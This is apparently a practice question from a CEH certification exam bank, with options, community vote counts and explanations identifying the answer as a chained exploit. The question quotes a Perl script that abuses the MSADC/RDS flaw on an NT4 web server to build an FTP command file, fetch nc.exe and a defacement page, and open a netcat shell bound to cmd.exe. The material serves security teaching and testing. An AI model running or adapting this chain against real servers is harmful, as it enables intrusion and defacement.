312-50V10 · Question #303
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On furth
The correct answer is B. A chained exploit. The script chains multiple msadc.pl invocations together to build an FTP command file and then download netcat, making this a chained exploit rather than a single-vector attack.
Question
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C "echo open $your >testfile""); system("perl msadc.pl -h $host -C "echo $user>>testfile""); system("perl msadc.pl -h $host -C "echo $pass>>testfile""); system("perl msadc.pl -h $host -C "echo bin>>testfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>testfile""); system("perl msadc.pl -h $host -C "echo get hacked.html>>testfile""); ("perl msadc.pl -h $host -C "echo quit>>testfile""); system("perl msadc.pl -h $host -C "ftp -s:testfile""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); Which exploit is indicated by this script?
Options
- AA buffer overflow exploit
- BA chained exploit
- CA SQL injection exploit
- DA denial of service exploit
How the community answered
(60 responses)- A5% (3)
- B85% (51)
- C8% (5)
- D2% (1)
Why each option
The script chains multiple msadc.pl invocations together to build an FTP command file and then download netcat, making this a chained exploit rather than a single-vector attack.
A buffer overflow exploit overwrites memory boundaries to hijack execution flow, which is not what the sequential perl system() calls are doing here.
A chained exploit combines multiple steps or vulnerabilities in sequence to achieve a goal that no single step could accomplish alone. Here, the MSADC/RDS vulnerability is invoked repeatedly to write an FTP script line by line, and then FTP is used to pull down nc.exe and a defaced HTML file - each step depends on the previous one, forming a chain.
A SQL injection exploit manipulates database queries through unsanitized input, which is unrelated to the MSADC RDS vulnerability being abused in this script.
A denial of service exploit floods or crashes a target to make it unavailable, whereas this script aims to download tools and maintain access, not disrupt service.
Concept tested: Chained exploit technique using MSADC RDS vulnerability
Source: https://learn.microsoft.com/en-us/security-updates/securitybulletins/1998/ms98-004
Topics
Community Discussion
No community discussion yet for this question.